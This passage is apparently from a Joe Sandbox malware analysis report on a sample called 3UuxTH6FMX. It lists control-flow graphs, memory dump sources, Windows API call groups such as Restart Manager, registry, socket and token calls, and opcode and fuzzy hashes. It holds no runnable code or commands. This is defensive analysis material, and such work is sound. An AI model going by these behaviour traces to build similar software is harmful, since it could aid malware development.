                                                                                                                                                                  control_flow_graph 1880 218bfbd3b30-218bfbd3b92 GetCurrentProcess GetProcessId RmStartSession 1881 218bfbd3c91 1880->1881 1882 218bfbd3b98-218bfbd3bbd RmRegisterResources 1880->1882 1885 218bfbd3c93-218bfbd3cb6 call 218bfbfcb70 1881->1885 1883 218bfbd3bc3-218bfbd3bf9 RmGetList 1882->1883 1884 218bfbd3c88-218bfbd3c8b RmEndSession 1882->1884 1886 218bfbd3cd4 1883->1886 1887 218bfbd3bff-218bfbd3c04 1883->1887 1884->1881 1891 218bfbd3cd7-218bfbd3cdf RmEndSession 1886->1891 1887->1886 1890 218bfbd3c0a-218bfbd3c30 call 218bfbe66e4 1887->1890 1890->1891 1894 218bfbd3c36-218bfbd3c58 RmGetList 1890->1894 1891->1885 1895 218bfbd3ccc-218bfbd3ccf call 218bfbdefd8 1894->1895 1896 218bfbd3c5a-218bfbd3c5d 1894->1896 1895->1886 1896->1895 1898 218bfbd3c5f-218bfbd3c68 1896->1898 1898->1884 1899 218bfbd3c6a 1898->1899 1900 218bfbd3c70-218bfbd3c7f 1899->1900 1901 218bfbd3cb7-218bfbd3cca call 218bfbdefd8 RmEndSession 1900->1901 1902 218bfbd3c81-218bfbd3c86 1900->1902 1901->1881 1902->1884 1902->1900
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Session$ListProcess$CurrentRegisterResourcesStart
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3299295986-0
                                                                                                                                                                  • Opcode ID: fd498ee3de36280c394abacf9467fc5b9ce5ac8d70b1b0db778499f5d870b0f3
                                                                                                                                                                  • Instruction ID: 7238e0cf5230b9527a97ccff57cfed7f2ad4b709cbdb5f4cf0bf4445cd4c58bb
                                                                                                                                                                  • Opcode Fuzzy Hash: fd498ee3de36280c394abacf9467fc5b9ce5ac8d70b1b0db778499f5d870b0f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 88513D36B18B508BF724CFA4E4986DD73A1F758788F584129EE0AA3B94DF34CA46C740

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2009 218bfbed5f0-218bfbed616 2010 218bfbed631-218bfbed635 2009->2010 2011 218bfbed618-218bfbed62c call 218bfbe40ac call 218bfbe40cc 2009->2011 2013 218bfbeda0b-218bfbeda17 call 218bfbe40ac call 218bfbe40cc 2010->2013 2014 218bfbed63b-218bfbed642 2010->2014 2028 218bfbeda22 2011->2028 2033 218bfbeda1d call 218bfbdfbec 2013->2033 2014->2013 2017 218bfbed648-218bfbed676 2014->2017 2017->2013 2020 218bfbed67c-218bfbed683 2017->2020 2023 218bfbed685-218bfbed697 call 218bfbe40ac call 218bfbe40cc 2020->2023 2024 218bfbed69c-218bfbed69f 2020->2024 2023->2033 2025 218bfbeda07-218bfbeda09 2024->2025 2026 218bfbed6a5-218bfbed6ab 2024->2026 2031 218bfbeda25-218bfbeda3c 2025->2031 2026->2025 2032 218bfbed6b1-218bfbed6b4 2026->2032 2028->2031 2032->2023 2035 218bfbed6b6-218bfbed6db 2032->2035 2033->2028 2038 218bfbed70e-218bfbed715 2035->2038 2039 218bfbed6dd-218bfbed6df 2035->2039 2040 218bfbed717-218bfbed73f call 218bfbededc call 218bfbeb550 * 2 2038->2040 2041 218bfbed6ea-218bfbed701 call 218bfbe40ac call 218bfbe40cc call 218bfbdfbec 2038->2041 2042 218bfbed706-218bfbed70c 2039->2042 2043 218bfbed6e1-218bfbed6e8 2039->2043 2072 218bfbed741-218bfbed757 call 218bfbe40cc call 218bfbe40ac 2040->2072 2073 218bfbed75c-218bfbed787 call 218bfbedcb0 2040->2073 2070 218bfbed894 2041->2070 2044 218bfbed78c-218bfbed7a3 2042->2044 2043->2041 2043->2042 2047 218bfbed7a5-218bfbed7ad 2044->2047 2048 218bfbed81e-218bfbed828 call 218bfbf7c7c 2044->2048 2047->2048 2051 218bfbed7af-218bfbed7b1 2047->2051 2061 218bfbed8b2 2048->2061 2062 218bfbed82e-218bfbed843 2048->2062 2051->2048 2055 218bfbed7b3-218bfbed7c9 2051->2055 2055->2048 2059 218bfbed7cb-218bfbed7d7 2055->2059 2059->2048 2064 218bfbed7d9-218bfbed7db 2059->2064 2066 218bfbed8b7-218bfbed8d7 ReadFile 2061->2066 2062->2061 2067 218bfbed845-218bfbed857 GetConsoleMode 2062->2067 2064->2048 2071 218bfbed7dd-218bfbed7f5 2064->2071 2074 218bfbed9d1-218bfbed9da call 218bfc22160 2066->2074 2075 218bfbed8dd-218bfbed8e5 2066->2075 2067->2061 2069 218bfbed859-218bfbed861 2067->2069 2069->2066 2077 218bfbed863-218bfbed885 call 218bfc223b8 2069->2077 2080 218bfbed897-218bfbed8a1 call 218bfbeb550 2070->2080 2071->2048 2079 218bfbed7f7-218bfbed803 2071->2079 2072->2070 2073->2044 2092 218bfbed9f7-218bfbed9fa 2074->2092 2093 218bfbed9dc-218bfbed9f2 call 218bfbe40cc call 218bfbe40ac 2074->2093 2075->2074 2076 218bfbed8eb 2075->2076 2084 218bfbed8f2-218bfbed907 2076->2084 2099 218bfbed887 call 218bfc22160 2077->2099 2100 218bfbed8a6-218bfbed8b0 2077->2100 2079->2048 2087 218bfbed805-218bfbed807 2079->2087 2080->2031 2084->2080 2090 218bfbed909-218bfbed914 2084->2090 2087->2048 2094 218bfbed809-218bfbed819 2087->2094 2097 218bfbed916-218bfbed92f call 218bfbed208 2090->2097 2098 218bfbed93b-218bfbed943 2090->2098 2103 218bfbeda00-218bfbeda02 2092->2103 2104 218bfbed88d-218bfbed88f call 218bfbe4040 2092->2104 2093->2070 2094->2048 2112 218bfbed934-218bfbed936 2097->2112 2107 218bfbed945-218bfbed957 2098->2107 2108 218bfbed9bf-218bfbed9cc call 218bfbed048 2098->2108 2099->2104 2100->2084 2103->2080 2104->2070 2113 218bfbed9b2-218bfbed9ba 2107->2113 2114 218bfbed959 2107->2114 2108->2112 2112->2080 2113->2080 2117 218bfbed95e-218bfbed965 2114->2117 2119 218bfbed967-218bfbed96b 2117->2119 2120 218bfbed9a1-218bfbed9ac 2117->2120 2121 218bfbed987 2119->2121 2122 218bfbed96d-218bfbed974 2119->2122 2120->2113 2124 218bfbed98d-218bfbed99d 2121->2124 2122->2121 2123 218bfbed976-218bfbed97a 2122->2123 2123->2121 2126 218bfbed97c-218bfbed985 2123->2126 2124->2117 2125 218bfbed99f 2124->2125 2125->2113 2126->2124
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 47550b20993fbd762e226fa4ca9e05ae32b1ced83bd225dda60327e294bd4ee8
                                                                                                                                                                  • Instruction ID: 7d4e20f7a332923f4d01b59038c5cabcabceef39858601cf15c1d565f889b3c5
                                                                                                                                                                  • Opcode Fuzzy Hash: 47550b20993fbd762e226fa4ca9e05ae32b1ced83bd225dda60327e294bd4ee8
                                                                                                                                                                  • Instruction Fuzzy Hash: 24C1F73620C78581E7619B55D4CC3ED77A0F7A4B88F594911DA6E83792DFB9CE44CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4268643673-0
                                                                                                                                                                  • Opcode ID: 83031f1c3d95a3b59bc2a22e43b72ccd41805d9851eefa9cc92077698de98015
                                                                                                                                                                  • Instruction ID: 7ce39344467c1cb98c7e20b29d46cb313101669d61463758616409fb081eafde
                                                                                                                                                                  • Opcode Fuzzy Hash: 83031f1c3d95a3b59bc2a22e43b72ccd41805d9851eefa9cc92077698de98015
                                                                                                                                                                  • Instruction Fuzzy Hash: EB113A32115B50C1FB109F25E89819D73B4FB64FA8B684615DA6D83AA4DF35CA96C340
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3936042273-0
                                                                                                                                                                  • Opcode ID: 68560b9ec9290b65af6a78de1ac2c7821c6a1d2327af68e69ac7e4eae41ab174
                                                                                                                                                                  • Instruction ID: 45edf0f01376e4b263107f61304ceb45d86917ee4d7118bf83986ea4c7f2f78e
                                                                                                                                                                  • Opcode Fuzzy Hash: 68560b9ec9290b65af6a78de1ac2c7821c6a1d2327af68e69ac7e4eae41ab174
                                                                                                                                                                  • Instruction Fuzzy Hash: 6881A432A1AB81D5FA11DB25F44026AB3A1FB84794F615235EAAC06BA9DF3CD582C710
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalProcessSectionToken$CurrentEnterInformationLeaveOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2440646923-0
                                                                                                                                                                  • Opcode ID: a6224817af5826b4e66e685dd3dccc438d8954053d36f8f870129e687be14717
                                                                                                                                                                  • Instruction ID: 23afdcbc666de7623dc8eb16e94c0d02dc26dffce3388fdd0efc6fe253cdcecd
                                                                                                                                                                  • Opcode Fuzzy Hash: a6224817af5826b4e66e685dd3dccc438d8954053d36f8f870129e687be14717
                                                                                                                                                                  • Instruction Fuzzy Hash: 27516421A0AA42E1FA61AB11F64037AF3B1BB44BC1FA64070DE5D077A4DF3DD4578750
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: NumbersVersion$Image$DataDirectoryEntryHandleHeaderModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1637451276-0
                                                                                                                                                                  • Opcode ID: c7c4423c1df835fe1051eadc678f80f7c1d6eee4b7a917dd86c14d9ff8850ea5
                                                                                                                                                                  • Instruction ID: 3c19c8ad60276fcbb826d0531b5cb5204d4934af340bdc153a8e974af7f082ad
                                                                                                                                                                  • Opcode Fuzzy Hash: c7c4423c1df835fe1051eadc678f80f7c1d6eee4b7a917dd86c14d9ff8850ea5
                                                                                                                                                                  • Instruction Fuzzy Hash: 1261AC32B15A42EAFB519F64E5402ACB3B1FB48748F950176CE0D53AA8EF3CE556C720
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                  • API String ID: 3702945584-1787575317
                                                                                                                                                                  • Opcode ID: 4b31b020cac4b58e91cc22bf7df28ffde147e0876d00deb1f16a5955c36cd2ac
                                                                                                                                                                  • Instruction ID: 2b435a15c1e7d3f49cf6a00abba36aeab98fac154f3c1eae3b664bd24dce1a4b
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b31b020cac4b58e91cc22bf7df28ffde147e0876d00deb1f16a5955c36cd2ac
                                                                                                                                                                  • Instruction Fuzzy Hash: D211813221CB8082EB20CF21F4947DEB3A4F799788F504215EA8843B59CFBCC295CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                  • Opcode ID: 21fc21dbb6ad935d438a32a9e8df0940595043e451ddcdce7bd13c1d828d7aed
                                                                                                                                                                  • Instruction ID: e059da90b026982d7ba3f1655470822d6749bcbe76a6bd17f6a788145b09c25a
                                                                                                                                                                  • Opcode Fuzzy Hash: 21fc21dbb6ad935d438a32a9e8df0940595043e451ddcdce7bd13c1d828d7aed
                                                                                                                                                                  • Instruction Fuzzy Hash: 78F1F436215B8482DA24CF25E4987ED67A4F768BE8F148725AFAD877C5DF38C690C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProcQueryVirtual_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3513549592-0
                                                                                                                                                                  • Opcode ID: e3ab0b1cb5af30e30cab7697ef1babff4d2411869d2c5dc3a56a725404a04dc9
                                                                                                                                                                  • Instruction ID: 65486b4417ddc952a3c62344bf60c55a8cbab2be45a417c90358b8022031398a
                                                                                                                                                                  • Opcode Fuzzy Hash: e3ab0b1cb5af30e30cab7697ef1babff4d2411869d2c5dc3a56a725404a04dc9
                                                                                                                                                                  • Instruction Fuzzy Hash: 8EC1C362F06651E4FB11AB61E4003ACB771BB08BD8FA641B1CF1C1B6A9CF78D586C360
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cleanupclosesocketrecv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3447645871-0
                                                                                                                                                                  • Opcode ID: e1e4bc0d9f538d8dda849055060beac834a4055df7170f002940a69e95862ddc
                                                                                                                                                                  • Instruction ID: 741e20256fcdcc5c34eca6602e0803a4f57b09a81e7464d65c09e6da55a63369
                                                                                                                                                                  • Opcode Fuzzy Hash: e1e4bc0d9f538d8dda849055060beac834a4055df7170f002940a69e95862ddc
                                                                                                                                                                  • Instruction Fuzzy Hash: 12919773A18BC481EA208B25E4983DE6761F7A57A4F505701DAAC87ADADF78CAC4C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseEnumOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1332880857-0
                                                                                                                                                                  • Opcode ID: 7bf3ae1290ca30c6776f7c830ae96f6287afa95ee85338a1be7a57fa8cf0fef0
                                                                                                                                                                  • Instruction ID: 48fabbe298fcd2cce49da1c47778368d2726a7894cb5e88c485c4b2e48e86e03
                                                                                                                                                                  • Opcode Fuzzy Hash: 7bf3ae1290ca30c6776f7c830ae96f6287afa95ee85338a1be7a57fa8cf0fef0
                                                                                                                                                                  • Instruction Fuzzy Hash: 3C71AF76A08B8486FB20CF65E4883DD6760F7A57ACF500205EAA893ED9DF78C6C1C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3231578192-0
                                                                                                                                                                  • Opcode ID: a8920e58832bf877e089fa0af907033f7a3b2d639e35d700202a240f283f6ca3
                                                                                                                                                                  • Instruction ID: c499c95854162a54ecb57c8b16d32c4c1d3e02da6505b69b7250fc2f4fc981f8
                                                                                                                                                                  • Opcode Fuzzy Hash: a8920e58832bf877e089fa0af907033f7a3b2d639e35d700202a240f283f6ca3
                                                                                                                                                                  • Instruction Fuzzy Hash: 6231A032608B8486F720CFA1E898BDE7774F75479CF600215EE9957A58DF78C692C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                  • Opcode ID: 25ecd56cdfa6cb38c68b5d1ffaefc2e2d501741111cb2a807e3fc63b6d899e6b
                                                                                                                                                                  • Instruction ID: 3771d61fa97630f4740ff580d5add6db7426b3e8336bca354c407bb4fc8b5e08
                                                                                                                                                                  • Opcode Fuzzy Hash: 25ecd56cdfa6cb38c68b5d1ffaefc2e2d501741111cb2a807e3fc63b6d899e6b
                                                                                                                                                                  • Instruction Fuzzy Hash: F0219A76A1D78482EE608B29E4D439EA750F7E57D8F505211EA8D83A99DF3CC6C4C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Info$User
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2017065092-0
                                                                                                                                                                  • Opcode ID: d34c2ece54cb3812040e4eef0477fed434900964bc97860851aa3e607d5351a2
                                                                                                                                                                  • Instruction ID: 65adabc024a23851d76d13af256f0465b58e2e665a55157c086b1ab6e970756a
                                                                                                                                                                  • Opcode Fuzzy Hash: d34c2ece54cb3812040e4eef0477fed434900964bc97860851aa3e607d5351a2
                                                                                                                                                                  • Instruction Fuzzy Hash: 46119D3261879082E7109F61F45479EB3A1F7A4B88F045224EB8543F59DF7CDA908B84
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProcessToken$CurrentInformationOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2743777493-0
                                                                                                                                                                  • Opcode ID: 5cf106d3b2ffd2a7e9a61a7f883b18dc6c947c023f1ec599732081f4b0d6fdce
                                                                                                                                                                  • Instruction ID: 91fc297738ecd3776740a50c8839c4a94e2a26932820316bf66737afa3e4cf08
                                                                                                                                                                  • Opcode Fuzzy Hash: 5cf106d3b2ffd2a7e9a61a7f883b18dc6c947c023f1ec599732081f4b0d6fdce
                                                                                                                                                                  • Instruction Fuzzy Hash: 91112E32219B9082FB508F16F89478FB7A0F798B84F545126EB8997B68CF3CC945CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                  • Opcode ID: f80d91bcf93e8424b3640f1b7356e3f7b22acd1ad7b3684da8aa45f97133e79c
                                                                                                                                                                  • Instruction ID: 028148fa1605cbdc3ff775b02229c6ad15ca110662348eb420506e7c90b00c3f
                                                                                                                                                                  • Opcode Fuzzy Hash: f80d91bcf93e8424b3640f1b7356e3f7b22acd1ad7b3684da8aa45f97133e79c
                                                                                                                                                                  • Instruction Fuzzy Hash: 3ED0923530871852FA187F7068EDAED23259B69759F48582C8A83D6797CE398E9D8200
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$Alloc$FreeQuery
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 609462816-0
                                                                                                                                                                  • Opcode ID: ea88e6755f1c952dde9103f57d4804c3fc97b2dab698ddd173a76000a050952f
                                                                                                                                                                  • Instruction ID: 0a293ec382a0e0318d38702ccd8634c0cb1aff0a30aafbe026edc318931da4b3
                                                                                                                                                                  • Opcode Fuzzy Hash: ea88e6755f1c952dde9103f57d4804c3fc97b2dab698ddd173a76000a050952f
                                                                                                                                                                  • Instruction Fuzzy Hash: 4871A525B0E642E5FA667A11F190279F3B4AF95BC4FA64070DE4D07BA5DE3CE8078320
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 118556049-3916222277
                                                                                                                                                                  • Opcode ID: f6b6934b9f8593f99abf1ba3628a2200090c895613474c1471e6307f15e81164
                                                                                                                                                                  • Instruction ID: f0c8b9cb7255206d18ae011cdc91a9540bd732c851c09b9de185fc33ab127245
                                                                                                                                                                  • Opcode Fuzzy Hash: f6b6934b9f8593f99abf1ba3628a2200090c895613474c1471e6307f15e81164
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B517376308B4496EF158F2AD19839C37A0F398B98F584612DF5D87BA6CF39D9A1C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
